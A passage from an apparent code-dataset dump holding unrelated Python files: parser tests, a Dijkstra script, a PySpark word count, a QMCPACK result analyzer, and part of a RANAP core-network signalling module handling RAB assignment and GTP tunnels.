input_file.read().splitlines()[0].split(\" \")\n yield words\n\n\ndef test_get_stop_words():\n test_parser = Parser(\n input_file=\"fake.txt\", rules_file=f\"{FILE_PATH}/test_stopwords.txt\"\n )\n assert test_parser.stop_words == {\"a\", \"about\", \"above\", \"after\", \"again\"}\n\n\ndef test_stop_words_removed(test_input):\n test_parser = Parser(\n input_file=\"fake.txt\", rules_file=f\"{FILE_PATH}/test_stopwords.txt\"\n )\n\n final_list = []\n for word in test_input:\n if not test_parser.exclude_stop_words(word):\n final_list.append(word)\n assert final_list == [\n \"There's\",\n \"story\",\n \"simple\",\n \"man\",\n \"trying\",\n \"to\",\n \"make\",\n \"his\",\n \"way\",\n \"in\",\n \"the\",\n \"universe\",\n ]\n\n\ndef test_non_alpha_removed(test_input):\n test_parser = Parser(input_file=\"fake.txt\", rules_file=\"fake.txt\")\n final_list = []\n for word in test_input:\n final_list.append(test_parser.remove_non_alpha(word))\n assert final_list == [\n \"Theres\",\n \"a\",\n \"story\",\n \"about\",\n \"a\",\n \"simple\",\n \"man\",\n \"trying\",\n \"to\",\n \"make\",\n \"his\",\n \"way\",\n \"in\",\n \"the\",\n \"universe\",\n ]\n\n\ndef test_parse_line():\n test_parser = Parser(\n input_file=\"fake.txt\", rules_file=f\"{FILE_PATH}/test_stopwords.txt\"\n )\n with open(f\"{FILE_PATH}/test_input.txt\") as input_file:\n line = input_file.read().splitlines()[0]\n test_parser.parse_line(line)\n assert test_parser.final_words == Counter(\n {\n \"there\": 1,\n \"stori\": 1,\n \"simpl\": 1,\n \"man\": 1,\n \"try\": 1,\n \"to\": 1,\n \"make\": 1,\n \"hi\": 1,\n \"wai\": 1,\n \"in\": 1,\n \"the\": 1,\n \"univers\": 1,\n }\n )\n\n\ndef test_parse_file():\n test_parser = Parser(\n input_file=f\"{FILE_PATH}/test_input.txt\",\n rules_file=f\"{FILE_PATH}/test_stopwords.txt\",\n )\n test_parser.parse_file()\n assert test_parser.final_words == Counter(\n {\n \"there\": 1,\n \"stori\": 1,\n \"simpl\": 1,\n \"man\": 1,\n \"try\": 1,\n \"to\": 1,\n \"make\": 1,\n \"hi\": 1,\n \"wai\": 1,\n \"in\": 1,\n \"the\": 1,\n \"univers\": 1,\n }\n )\n\n\ndef test_insert_top_word():\n test_parser = Parser(input_file=\"fake.txt\", rules_file=\"fake.txt\")\n top_words = [(\"a\", 4), (\"b\", 3)]\n test_parser.insert_top_word(0, top_words, 5, \"c\", 5)\n assert top_words == [(\"c\", 5), (\"a\", 4), (\"b\", 3)]\n\n\ndef test_insert_top_word_beyond_max():\n test_parser = Parser(input_file=\"fake.txt\", rules_file=\"fake.txt\")\n top_words = [(\"a\", 4), (\"b\", 3)]\n test_parser.insert_top_word(3, top_words, 2, \"c\", 2)\n assert top_words == [(\"a\", 4), (\"b\", 3)]\n\n\ndef test_get_root_word():\n test_parser = Parser(input_file=\"fake.txt\", rules_file=\"fake.txt\")\n root_words = []\n with open(f\"{FILE_PATH}/test_stem.txt\") as f:\n for word in f.read().splitlines():\n root_words.append(test_parser.get_root_word(word))\n assert root_words == [\"jump\", \"jump\", \"jump\"]\n\n\ndef test_top_words():\n # Seed random to ensure same results\n random.seed(1)\n test_parser = Parser(input_file=\"fake.txt\", rules_file=\"fake.txt\")\n for letter in string.ascii_lowercase:\n test_parser.final_words[letter] = random.randint(1, 20)\n top_words = test_parser.get_top_words(20)\n print(test_parser.final_words.most_common(20))\n print(top_words)\n assert top_words == [\n (\"p\", 20),\n (\"b\", 19),\n (\"u\", 19),\n (\"f\", 16),\n (\"h\", 16),\n (\"l\", 16),\n (\"g\", 15),\n (\"r\", 15),\n (\"o\", 14),\n (\"i\", 13),\n (\"n\", 13),\n (\"w\", 11),\n (\"d\", 9),\n (\"s\", 9),\n (\"t\", 8),\n (\"j\", 7),\n (\"a\", 5),\n (\"e\", 4),\n (\"k\", 4),\n (\"v\", 4),\n ]\n","repo_name":"nrgeil/programming_assignment","sub_path":"test/test_parser.py","file_name":"test_parser.py","file_ext":"py","file_size_in_byte":4349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9158110691","text":"import sys\n\ndef dijkstra(K,V,graph):\n INF=sys.maxsize\n s=[False]*V\n d=[INF]*V\n d[K-1]=0\n while True:\n m=INF\n N=-1\n\n for j in range(V):\n if not s[j] and m>d[j]:\n m=d[j]\n N=j\n\n if m==INF:\n break\n\n s[N]=True\n\n for j in range(V):\n if s[j]: continue\n via=d[N]+graph[N][j]\n if d[j] > via:\n d[j] = via\n return d \n\n\n\n\nINF=sys.maxsize\n\nV,X,Y=map(int,(input().split()))\ngraph=[[INF]*(V) for _ in range(V)]\n\nfor _ in range(V-1):\n u,v,w=map(int,input().split())\n graph[u-1][v-1]=w\n graph[v-1][u-1]=w\n\nfor i in range(V-1):\n for j in range(V-1):\n print(graph[i][j] if graph[i][j]!=INF else \"INF\",end=' ')\n print()\n\n#for d in dijkstra(1,V,graph):\n# print(d if d!= INF else \"INF\", end= ' ')\n\nd=dijkstra(1,V,graph)\nprint(d)\n\n\n\n\n\n","repo_name":"gitcheol/MyGit","sub_path":"Algorithms/python/15971.py","file_name":"15971.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27665595825","text":"## word count proram in python\n\nfrom pyspark import SparkConf,SparkContext\n\nconf = SparkConf().setAppName(\"Word Count\")\n\nsc = SparkContext(conf=conf)\n\ndataRDD = sc.textFile(\"hdfs://quickstart.cloudera:8020/user/cloudera/spark/testdata.txt\")\n\n## split each row and flatten the arrays as rows\ndataFlatMap = dataRDD.flatMap(lambda x: x.split(\" \"))\n\n## Assign a vlue 1 for each word\ndataMap = dataFlatMap.map(lambda x: (x, 1))\n\n## reduce the map by summing up all the 1s against each word which is a key hence reduceByKey\nwordCount = dataMap.reduceByKey(lambda x, y: x+y)\n\nfor rec in wordCount.collect():\n\tprint(rec)\n\n\n\n\n","repo_name":"krishnapriyaps/CCA_175_Study","sub_path":"pyspark/wordCount.py","file_name":"wordCount.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31791036401","text":"\"\"\"\nauthor : Lee Sang Min\ngithub : https://github.com/sangm1n\ne-mail : dltkd96als@naver.com\n\ntitle : 수들의 합 5\ndescription : Two Pointer\n\"\"\"\n\nN = int(input())\n\ni, j = 1, 2\ntotal = 3\nresult = 0\nwhile i <= N-1 and j <= N:\n if total < N:\n j += 1\n total += j\n else:\n if total == N:\n result += 1\n i += 1\n total -= i-1\n\nprint(result + 1)\n","repo_name":"sangm1n/problem-solving","sub_path":"BOJ/2018.py","file_name":"2018.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71125539572","text":"from numpy import array,empty,zeros,sqrt,arange\nfrom generic import obj\nfrom unit_converter import convert\nfrom qmcpack_input import QmcpackInput\nfrom qmcpack_analyzer_base import QAobject,QAanalyzer\nfrom debug import *\n\n\n\nclass ResultAnalyzer(QAanalyzer):\n None\n#end class ResultAnalyzer\n\n\nclass OptimizationAnalyzer(ResultAnalyzer):\n def __init__(self,input,opts,energy_weight=None,variance_weight=None,nindent=0):\n QAanalyzer.__init__(self,nindent=nindent)\n\n self.opts = opts\n self.energy_weight = energy_weight\n self.variance_weight = variance_weight\n\n\n ew,vw = energy_weight,variance_weight\n if ew is None or vw is None:\n opts_in = [] \n for qmc in input.simulation.calculations:\n if qmc.method in self.opt_methods:\n opts_in.append(qmc)\n #end if\n #end for\n optin = opts_in[-1] #take cost info from the last optimization section\n curv,crv,ce = optin.get(['unreweightedvariance','reweightedvariance','energy'])\n if curv is None and crv is None and ce is None:\n if optin.minmethod.lower().startswith('oneshift'):\n ce = 1.0 # energy-only for oneshift\n crv = 0.0\n else:\n ce = 0.9 # qmcpack defaults\n crv = 0.1\n #end if\n #end if\n if vw is None:\n vw = 0\n if crv is not None:\n vw += crv\n #end if\n if curv is not None:\n vw += curv\n #end if\n #end if\n if ew is None:\n ew = 0\n if ce is not None:\n ew = ce\n #end if\n #end if\n #end if\n\n if self.optimize=='lastcost':\n self.optimize = ew,vw\n #end if\n\n #end def __init__\n\n\n def init_sub_analyzers(self):\n None\n #end def init_sub_analyzers\n\n def analyze_local(self):\n input = QAanalyzer.run_info.input\n self.info.system = QAanalyzer.run_info.system\n opts = obj(self.opts)\n ew = self.energy_weight\n vw = self.variance_weight\n\n Efail = 1e6\n Vfail = 1e3\n EVratio_fail = 0.30\n EVratio_soft_fail = 0.15\n \n #save the energies and variances of opt iterations\n res = obj()\n variance_present = False\n any_complete = False\n all_complete = True\n unstable = False\n any_stable = False\n for s,opt in opts.items():\n if s==0:\n continue\n #end if\n complete = opt.info.complete\n any_complete |= complete\n all_complete &= complete\n if complete:\n fail = False\n le = opt.scalars.LocalEnergy\n en = le.mean\n enerr = le.error\n fail |= abs(en)>Efail\n if 'LocalEnergyVariance' in opt.scalars:\n variance_present = True\n lev = opt.scalars.LocalEnergyVariance\n va = lev.mean\n vaerr = lev.error\n fail |= abs(va)>Vfail or abs(va/en)>EVratio_fail\n #end if\n if not fail:\n any_stable = True\n sres = obj()\n sres.en = en\n sres.enerr = enerr\n if variance_present:\n sres.va = va\n sres.vaerr = vaerr\n #end if\n res[s] = sres\n #end if\n unstable|=fail\n #end if\n #end for\n unstable |= not any_complete\n\n nseries = len(res)\n en = zeros((nseries,),dtype=float)\n enerr = zeros((nseries,),dtype=float)\n va = zeros((nseries,),dtype=float)\n vaerr = zeros((nseries,),dtype=float)\n\n series = array(sorted(res.keys()),dtype=int)\n i = 0\n for s in series:\n sres = res[s]\n en[i] = sres.en\n enerr[i] = sres.enerr\n if variance_present:\n va[i] = sres.va\n vaerr[i] = sres.vaerr\n #end if\n i+=1\n #end for\n \n\n self.set(\n any_complete = any_complete,\n all_complete = all_complete,\n unstable = unstable,\n series = series,\n energy = en,\n energy_error = enerr,\n variance = va,\n variance_error = vaerr,\n )\n\n\n #find the optimal coefficients\n optimize = self.optimize\n if variance_present and optimize=='variance':\n ew = 0.0\n vw = 1.0\n elif optimize=='energy':\n ew = 1.0\n vw = 0.0\n elif optimize=='energy_within_variance_tol' or optimize=='ewvt':\n None\n elif optimize=='last':\n None\n elif isinstance(optimize,(tuple,list)) and len(optimize)==2:\n ew,vw = optimize\n else:\n self.error('selection for optimization is invalid\\noptimize setting: {0}\\nvalid options are: energy, variance, energy_within_variance_tol, or a length 2 tuple containing the cost of energy and variance, e.g. (.5,.5)'.format(optimize))\n #end if\n\n self.failed = True\n self.optimal_series = None\n self.optimal_file = None\n self.optimal_wavefunction = None\n if any_stable:\n if optimize=='energy_within_variance_tol' or optimize=='ewvt':\n indices = arange(len(series),dtype=int)\n vartol = 0.2\n vmin = va.min()\n vind = indices[abs(va-vmin)/vminEfail or abs(va[index])>Vfail or abs(va[index]/en[index])>EVratio_soft_fail \n\n self.failed = failed\n # In QMCPACK series the optimal parameters are off by 1 index\n opt_series -= 1\n self.optimal_series = opt_series\n self.optimal_file = opts[opt_series].info.files.opt\n self.optimal_wavefunction = opts[opt_series].wavefunction.info.wfn_xml.copy()\n #end if\n #end def analyze_local\n\n\n def summarize(self,units='eV',norm=1.,energy=True,variance=True,header=True):\n if isinstance(norm,str):\n norm = norm.replace('_',' ').replace('-',' ')\n if norm=='per atom':\n norm = len(self.info.system.structure.elem)\n else:\n self.error('norm must be a number or \"per atom\"\\n you provided '+norm)\n #end if\n #end if\n econv = convert(1.0,'Ha',units)/norm\n en = econv*self.energy\n enerr = econv*self.energy_error\n va = econv**2*self.variance\n vaerr = econv**2*self.variance_error\n emax = en.max()\n vmax = va.max()\n if header:\n print('Optimization summary:')\n print('====================')\n #end if\n if energy:\n if header:\n print(' Energies ({0}):'.format(units))\n #end if\n for i in range(len(en)):\n print(' {0:>2} {1:9.6f} +/-{2:9.6f}'.format(i,en[i]-emax,enerr[i]))\n #end for\n print(' ref {0:9.6f}'.format(emax))\n #end if\n if variance:\n if header:\n print(' Variances ({0}^2):'.format(units))\n #end if\n for i in range(len(en)):\n print(' {0:>2} {1:9.6f} +/- {2:9.6f}'.format(i,va[i],vaerr[i]))\n #end for\n #end if\n #end def summarize\n\n\n def plot_opt_convergence(self,title=None,saveonly=False):\n if title is None:\n ts = 'Optimization: Energy/Variance Convergence'\n else:\n ts = title\n #end if\n from matplotlib.pyplot import figure,subplot,xlabel,ylabel,plot,errorbar,title,xticks,xlim\n\n opt = self.opts\n nopt = len(opt)\n if nopt==0:\n return\n #end if\n\n en = self.energy\n enerr = self.energy_error\n va = self.variance\n vaerr = self.variance_error\n\n #plot energy and variance\n figure()\n r = list(range(nopt))\n subplot(3,1,1)\n errorbar(r,en,enerr,fmt='b')\n ylabel('Energy (Ha)')\n title(ts)\n xticks([])\n xlim([r[0]-.5,r[-1]+.5])\n subplot(3,1,2)\n errorbar(r,va,vaerr,fmt='r')\n ylabel('Var. ($Ha^2$)')\n xticks([])\n xlim([r[0]-.5,r[-1]+.5])\n subplot(3,1,3)\n plot(r,abs(sqrt(va)/en),'k')\n ylabel('Var.^(1/2)/|En.|')\n xlabel('Optimization attempts')\n xticks(r)\n xlim([r[0]-.5,r[-1]+.5])\n #end def plot_opt_convergence\n \n\n def plot_jastrow_convergence(self,title=None,saveonly=False,optconv=True):\n if title is None:\n tsin = None\n else:\n tsin = title\n #end if\n from matplotlib.pyplot import figure,subplot,xlabel,ylabel,plot,errorbar,title,xticks,xlim\n\n opt = self.opts\n nopt = len(opt)\n if nopt==0:\n return\n #end if\n\n if optconv:\n self.plot_opt_convergence(saveonly=saveonly)\n #end if\n\n #plot Jastrow functions\n w = opt[0].wavefunction\n jtypes = w.jastrow_types\n order = QAobject()\n for jt in jtypes:\n if jt in w:\n order[jt] = list(w[jt].__dict__.keys())\n order[jt].sort()\n #end if\n #end for\n cs = array([1.,0,0])\n ce = array([0,0,1.])\n for jt in jtypes:\n if jt in w:\n figure()\n nsubplots = len(order[jt])\n n=0\n for o in order[jt]:\n n+=1\n subplot(nsubplots,1,n)\n if n==1:\n if tsin is None:\n ts = 'Optimization: '+jt+' Convergence'\n else:\n ts = tsin\n #end if\n title(ts)\n #end if\n for i in range(len(opt)):\n f = float(i)/len(opt)\n c = f*ce + (1-f)*cs\n J = opt[i].wavefunction[jt][o]\n J.plot(color=c)\n #end for\n ylabel(o)\n #end for\n xlabel('r (Bohr)')\n #end if\n #end for\n #end def plot_jastrow_convergence\n\n\n#end class OptimizationAnalyzer\n\n\n\n\n\n\nclass TimestepStudyAnalyzer(ResultAnalyzer):\n def __init__(self,dmc,nindent=0):\n QAanalyzer.__init__(self,nindent=nindent)\n self.set(\n dmc = dmc,\n timesteps = [],\n energies = [],\n errors = []\n )\n #end def __init__\n\n def init_sub_analyzers(self):\n None\n #end def init_sub_analyzers\n\n def analyze_local(self):\n timesteps = []\n energies = []\n errors = []\n for dmc in self.dmc:\n timesteps.append(dmc.info.method_input.timestep)\n energies.append(dmc.scalars.LocalEnergy.mean)\n errors.append(dmc.scalars.LocalEnergy.error)\n #end for\n timesteps = array(timesteps)\n energies = array(energies)\n errors = array(errors)\n order = timesteps.argsort()\n self.timesteps = timesteps[order]\n self.energies = energies[order]\n self.errors = errors[order]\n #end def analyze_local\n\n def summarize(self,units='eV',header=True):\n timesteps = self.timesteps\n energies = convert(self.energies.copy(),'Ha',units)\n errors = convert(self.errors.copy(),'Ha',units)\n Esmall = energies[0]\n if header:\n print('Timestep study summary:')\n print('======================')\n #end if\n for i in range(len(timesteps)):\n ts,E,Eerr = timesteps[i],energies[i],errors[i]\n print(' {0:>6.4f} {1:>6.4f} +/- {2:>6.4f}'.format(ts,E-Esmall,Eerr))\n #end for\n #end def summarize\n\n def plot_timestep_convergence(self):\n from matplotlib.pyplot import figure,subplot,xlabel,ylabel,plot,errorbar,title,text,xticks,rcParams,savefig,xlim\n\n params = {'legend.fontsize':14,'figure.facecolor':'white','figure.subplot.hspace':0.,\n 'axes.labelsize':16,'xtick.labelsize':14,'ytick.labelsize':14}\n rcParams.update(params) \n\n\n timesteps = self.timesteps\n energies = convert(self.energies.copy(),'Ha','eV')\n errors = convert(self.errors.copy(),'Ha','eV')\n Esmall = energies[0]\n\n figure()\n tsrange = [0,1.1*timesteps[-1]]\n plot(tsrange,[0,0],'k-')\n errorbar(timesteps,energies-Esmall,errors,fmt='k.')\n text(array(tsrange).mean(),0,'{0:6.4f} eV'.format(Esmall))\n xticks(timesteps)\n xlim(tsrange)\n xlabel('Timestep (Ha)')\n ylabel('Total Energy (eV)')\n title('DMC Timestep Convergence')\n\n savefig('TimestepConvergence.png',format='png',bbox_inches ='tight',pad_inches=1)\n #end def plot_timestep_convergence\n#end class TimestepStudyAnalyzer\n","repo_name":"QMCPACK/qmcpack","sub_path":"nexus/lib/qmcpack_result_analyzers.py","file_name":"qmcpack_result_analyzers.py","file_ext":"py","file_size_in_byte":13869,"program_lang":"python","lang":"en","doc_type":"code","stars":261,"dataset":"github-code","pt":"21"} +{"seq_id":"71077811572","text":"__all__ = [\n 'RANAPSigProc',\n 'RANAPConlessSigProc',\n #\n 'RANAPRelocationPreparation',\n 'RANAPRelocationCancel',\n 'RANAPRABReleaseRequest',\n 'RANAPIuReleaseRequest',\n 'RANAPRelocationDetect',\n 'RANAPRelocationComplete',\n 'RANAPLocationReport',\n 'RANAPInitialUEMessage',\n 'RANAPDirectTransferRNC',\n 'RANAPErrorIndRNC',\n 'RANAPSRNSContextForwardToCN',\n 'RANAPPrivateMessageRNC',\n 'RANAPRABModificationRequest',\n 'RANAPMBMSRegistration',\n 'RANAPMBMSRABEstablishmentInd',\n 'RANAPMBMSRABRelease',\n 'RANAPEnhancedRelocationComplete',\n 'RANAPEnhancedRelocationCompleteConfirm',\n 'RANAPSRVCCPreparation',\n 'RANAPUERegistrationQuery',\n 'RANAPRABAssignment',\n 'RANAPIuRelease',\n 'RANAPRelocationResourceAllocation',\n 'RANAPSRNSContextTransfer',\n 'RANAPSecurityModeControl',\n 'RANAPDataVolumeReport',\n 'RANAPCommonID',\n 'RANAPCNInvokeTrace',\n 'RANAPLocationReportingControl',\n 'RANAPDirectTransferCN',\n 'RANAPErrorIndCN',\n 'RANAPSRNSDataForwarding',\n 'RANAPSRNSContextForwardToRNC',\n 'RANAPPrivateMessageCN',\n 'RANAPCNDeactivateTrace',\n 'RANAPLocationRelatedData',\n 'RANAPUESpecificInformation',\n 'RANAPMBSMSessionStart',\n 'RANAPMBMSSessionUpdate',\n 'RANAPMBMSSessionStop',\n 'RANAPMBMSUELinking',\n 'RANAPMBMSCNDeregistration',\n 'RANAPUERadioCapabilityMatch',\n 'RANAPRerouteNASRequest',\n #\n 'RANAPResetRNC',\n 'RANAPResetCN',\n 'RANAPPaging',\n 'RANAPOverloadControlRNC',\n 'RANAPOverloadControlCN',\n 'RANAPErrorIndConlessRNC',\n 'RANAPErrorIndConlessCN',\n 'RANAPResetResourceRNC',\n 'RANAPResetResourceCN',\n 'RANAPUplinkInformationTransfer',\n 'RANAPInformationTransfer',\n 'RANAPDirectInformationTransferRNC',\n 'RANAPDirectInformationTransferCN',\n #\n 'RANAPProcRncDispatcher',\n 'RANAPProcCnDispatcher',\n 'RANAPConlessProcRncDispatcher',\n 'RANAPConlessProcCnDispacther'\n ]\n\nfrom .utils import *\nfrom .ProcProto import *\n\n#------------------------------------------------------------------------------#\n# RANAP signalling procedure\n# TS 25.413, version d20\n# Core Network side\n#------------------------------------------------------------------------------#\n\nclass RANAPSigProc(LinkSigProc):\n \"\"\"RANAP connection-oriented signalling procedure handler\n \n instance attributes:\n - Name : procedure name\n - Iu : reference to the Iu[C|P]Sd instance running this procedure\n - RNC : reference to the HNBd instance connected by Iu\n - Server: reference to the CorenetServer instance handling the RNC\n - UE : reference to the UEd instance connected by Iu\n - Desc : ASN.1 procedure description\n - Code : procedure code\n - Crit : procedure criticality\n - Cont : ASN.1 procedure PDU(s) content\n - Encod : custom PDU encoders with fixed values\n - Decod : custom PDU decoders with transform functions\n \"\"\"\n \n TRACK_PDU = True\n \n # for UE-related signalling\n UE = None\n \n def __init__(self, iud):\n #\n self.Name = self.__class__.__name__\n self.Iu = iud\n self.RNC = iud.RNC\n self.Server = iud.RNC.Server\n if iud.UE:\n self.UE = iud.UE\n else:\n self._log('WNG', 'no UEd instance attached')\n #\n # to store PDU traces\n self._pdu = []\n # list of PDU to be sent to the HNB\n self._pdu_tx = []\n # enable NAS procedure to set callback to .postprocess() before self terminates\n self._cb = None\n #\n self._log('DBG', 'instantiating procedure')\n \n def _log(self, logtype, msg):\n self.Iu._log(logtype, '[%s] %s' % (self.Name, msg))\n \n def _recv(self, pdu_rx):\n if self.TRACK_PDU:\n self._pdu.append( (time(), 'UL', pdu_rx) )\n self.errcause, self.UEInfo = None, {}\n try:\n self.decode_pdu(pdu_rx, self.UEInfo)\n except Exception as err:\n self._err = err\n self._log('ERR', 'decode_pdu (%s), sending error indication' % err)\n # error cause: protocol, abstract-syntax-error-reject\n self.errcause = ('protocol', 100)\n \n def recv(self, pdu_rx):\n self._recv(pdu_rx)\n self._log('ERR', 'recv() not implemented')\n \n def _send(self):\n if self.TRACK_PDU:\n for pdu in self._pdu_tx:\n self._pdu.append( (time(), 'DL', pdu) )\n return self._pdu_tx\n \n def send(self):\n self._log('ERR', 'send() not implemented')\n return self._send()\n \n def trigger(self):\n return []\n \n def abort(self):\n if self.Code in self.Iu.Proc:\n del self.Iu.Proc[self.Code]\n self._log('INF', 'aborting')\n\n\nclass RANAPConlessSigProc(LinkSigProc):\n \"\"\"RANAP connection-less signalling procedure handler\n \n instance attributes:\n - Name : procedure name\n - RNC : reference to the HNBd instance connected by Iu\n - Server: reference to the CorenetServer instance handling the RNC\n - Desc : ASN.1 procedure description\n - Code : procedure code\n - Crit : procedure criticality\n - Cont : ASN.1 procedure PDU(s) content\n - Encod : custom PDU encoders with fixed values\n - Decod : custom PDU decoders with transform functions\n \"\"\"\n \n TRACK_PDU = True\n \n def __init__(self, rncd):\n #\n self.Name = self.__class__.__name__\n self.RNC = rncd\n self.Server = rncd.Server\n #\n # to store PDU traces\n self._pdu = []\n # list of PDU to be sent to the HNB\n self._pdu_tx = []\n #\n self._log('DBG', 'instantiating procedure')\n \n def _log(self, logtype, msg):\n self.RNC._log(logtype, '[%s] %s' % (self.Name, msg))\n \n def _recv(self, pdu_rx):\n if self.TRACK_PDU:\n self._pdu.append( (time(), 'UL', pdu_rx) )\n self.errcause, self.RNCInfo = None, {}\n try:\n self.decode_pdu(pdu_rx, self.RNCInfo)\n except Exception as err:\n self._err = err\n self._log('ERR', 'decode_pdu (%s), sending error indication' % err)\n # error cause: protocol, abstract-syntax-error-reject\n self.errcause = ('protocol', 100)\n \n def recv(self, pdu_rx):\n self._recv(pdu_rx)\n self._log('ERR', 'recv() not implemented')\n \n def _send(self):\n if self.TRACK_PDU:\n for pdu in self._pdu_tx:\n self._pdu.append( (time(), 'DL', pdu) )\n return self._pdu_tx\n \n def send(self):\n self._log('ERR', 'send() not implemented')\n return self._send()\n \n def trigger(self):\n return []\n \n def abort(self):\n if self.Code in self.RNC.ProcRanap:\n del self.RNC.ProcRanap[self.Code]\n self._log('INF', 'aborting')\n\n\nclass RANAPRABAssignment(RANAPSigProc):\n \"\"\"RAB Assignment: TS 25.413, section 8.2\n \n CN-initiated\n request-response(s)\n connection-oriented signalling procedure\n \n InitiatingMessage:\n IEs:\n - 41: RAB_ReleaseList (O)\n - 54: RAB_SetupOrModifyList (O)\n Extensions:\n - 233: UE_AggregateMaximumBitRate (O)\n - 239: MSISDN (O)\n Outcome:\n IEs:\n - 9: CriticalityDiagnostics (O)\n - 35: RAB_FailedList (O)\n - 38: RAB_QueuedList (O)\n - 39: RAB_ReleaseFailedList (O)\n - 43: RAB_ReleasedList (O)\n - 52: RAB_SetupOrModifiedList (O)\n Extensions:\n - 110: GERAN_Iumode_RAB_FailedList_RABAssgntResponse (O)\n \"\"\"\n \n # ASN.1 procedure description\n Desc = RANAP.RANAP_PDU_Descriptions.rAB_Assignment\n \n # Custom decoders\n Decod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': None\n }\n \n # Custom encoders\n Encod = {\n 'ini': ({}, {}),\n 'suc': ({}, {}),\n 'uns': None\n }\n \n # TODO: currently, only the creation of RAB is handled here\n # the deletion of RAB should also be implemented at least, to support\n # the NAS SM procedure DeactivatePDPCtxtReq\n \n def send(self):\n if hasattr(self, '_gtp_add_mobile_nsapi'):\n self._enable_gtpu()\n # in case of RAB teardown, we wait for the outcome to disable the GTP tunnels\n return self._send()\n \n def _enable_gtpu(self):\n if hasattr(self, '_gtp_add_mobile_nsapi'):\n for nsapi in self._gtp_add_mobile_nsapi:\n pdpcfg = self.Iu.SM.PDP[nsapi]\n rabcfg = pdpcfg['RAB']\n pdpcfg['state'] = 1\n self.UE.Server.GTPUd.add_mobile(\n rabcfg['SGW-GTP-TEID'], # teid_ul\n pdpcfg['PDPAddr'], # mobile_addr\n (rabcfg['SGW-TLA'], rabcfg['HNB-TLA']), # local gtpu addr, hnb gtpu ip (maybe None)\n rabcfg['HNB-GTP-TEID']) # teid_dl (maybe None)\n else:\n self._log('WNG', 'enable_gtpu: no GTP mobile info provided')\n \n def _disable_gtpu(self):\n if hasattr(self, '_gtp_rem_mobile_nsapi'):\n for nsapi in self._gtp_rem_mobile_nsapi:\n if nsapi in self.Iu.SM.PDP:\n pdpcfg = self.Iu.SM.PDP[nsapi]\n self.Server.GTPUd.rem_mobile(pdpcfg['RAB']['SGW-GTP-TEID'])\n pdpcfg['state'] = 0\n else:\n self._log('WNG', 'disable_gtpu: no GTP mobile info provided')\n \n def recv(self, pdu):\n self._recv(pdu)\n try:\n del self.Iu.Proc[self.Code]\n except Exception:\n pass\n #\n if self.errcause:\n self.success = False\n self._log('WNG', 'error in the response decoding')\n if hasattr(self, '_gtp_add_mobile_nsapi'):\n self._gtp_rem_mobile_nsapi = self._gtp_add_mobile_nsapi\n if hasattr(self, '_gtp_rem_mobile_nsapi'):\n self._disable_gtpu()\n else:\n self.success = True\n if hasattr(self, '_gtp_add_mobile_nsapi'):\n self._gtp_rem_mobile_nsapi = []\n # TODO: rablists are sequence of sequence of rabitem...\n # here we go over all 1st level item\n # and take the 1st item of the previous selection to call it \"rabitem\"\n # in case rabitem are sequenced at the 2nd level, we won't see them...\n #\n if 'RAB_SetupOrModifiedList' in self.UEInfo:\n # RAB successfully established, to be completed with eNB IP and TEID\n for rabitem in self.UEInfo['RAB_SetupOrModifiedList']:\n rabitem = rabitem[0]['value'][1]\n nsapi = rabitem['rAB-ID'][0]\n if nsapi in self._gtp_add_mobile_nsapi:\n rabcfg = self.Iu.SM.PDP[nsapi]['RAB']\n tla = rabitem['transportLayerAddress']\n if tla[1] == 32:\n # raw IPv4 address\n rabcfg['HNB-TLA'] = inet_ntoa(uint_to_bytes(*rabitem['transportLayerAddress']))\n elif tla[1] == 160:\n # X.213 addr\n x213pref = tla[0]>>136\n if x213pref>>16 == 0x35 and x213pref & 0xffff == 1:\n # IPv4 address\n rabcfg['HNB-TLA'] = inet_ntoa(uint_to_bytes((tla[0]>>104)&0xffffffff, 32))\n if rabcfg['HNB-TLA'] is None:\n self._log('WNG', 'no IPv4 TLA provided')\n self._gtp_rem_mobile_nsapi.append(nsapi)\n else:\n if rabitem['iuTransportAssociation'][0] == 'gTP-TEI':\n rabcfg['HNB-GTP-TEID'] = bytes_to_uint(rabitem['iuTransportAssociation'][1], 32)\n # activate the GTP DL parameters\n self.Server.GTPUd.set_mobile_dl(\n rabcfg['SGW-GTP-TEID'], # teid_ul\n ran_ip=(rabcfg['SGW-TLA'], rabcfg['HNB-TLA']),\n teid_dl=rabcfg['HNB-GTP-TEID'])\n else:\n self._log('WNG', 'no GTP TEID provided')\n self._gtp_rem_mobile_nsapi.append(nsapi)\n #\n if 'RAB_FailedList' in self.UEInfo:\n # RAB failed to establish, to be disabled\n for rabitem in self.UEInfo['RAB_FailedList']:\n rabitem = rabitem[0]['value'][1]\n nsapi = rabitem['rAB-ID'][0]\n if nsapi in self._gtp_add_mobile_nsapi:\n self._gtp_rem_mobile_nsapi.append(nsapi)\n self._log('INF', 'unable to establish RAB %i, cause %r'\\\n % (nsapi, rabitem['cause']))\n #\n if 'RAB_QueueList' in self.UEInfo:\n self._log('WNG', 'handling of RAB-QueueList not implemented')\n # TODO\n #\n if 'RAB_ReleaseFailedList' in self.UEInfo:\n # RAB failed to be toredown\n for rabitem in self.UEInfo['RAB_ReleaseFailedList']:\n rabitem = rabitem[0]['value'][1]\n nsapi = rabitem['rAB-ID'][0]\n if nsapi in self._gtp_rem_mobile_nsapi:\n self._log('INF', 'unable to release RAB %i, cause %r'\\\n % (nsapi, rabitem['cause']))\n #\n if 'RAB_ReleasedList' in self.UEInfo:\n # RAB successfully tore down\n for rabitem in self.UEInfo['RAB_ReleasedList']:\n rabitem = rabitem[0]['value'][1]\n nsapi = rabitem['rAB-ID'][0]\n if nsapi in self._gtp_rem_mobile_nsapi:\n # nothing to do actually\n pass\n #\n if self._gtp_rem_mobile_nsapi:\n self._disable_gtpu()\n #\n if self._cb:\n self._ret = self.Iu.trigger_nas(self)\n self._cb = None\n else:\n self._ret = []\n \n def trigger(self):\n if self._ret:\n # new RANAP procedure prepared by the NAS layer\n return self._ret\n else:\n return []\n \n def abort(self):\n RANAPSigProc.abort(self)\n if hasattr(self, '_gtp_add_mobile_nsapi'):\n 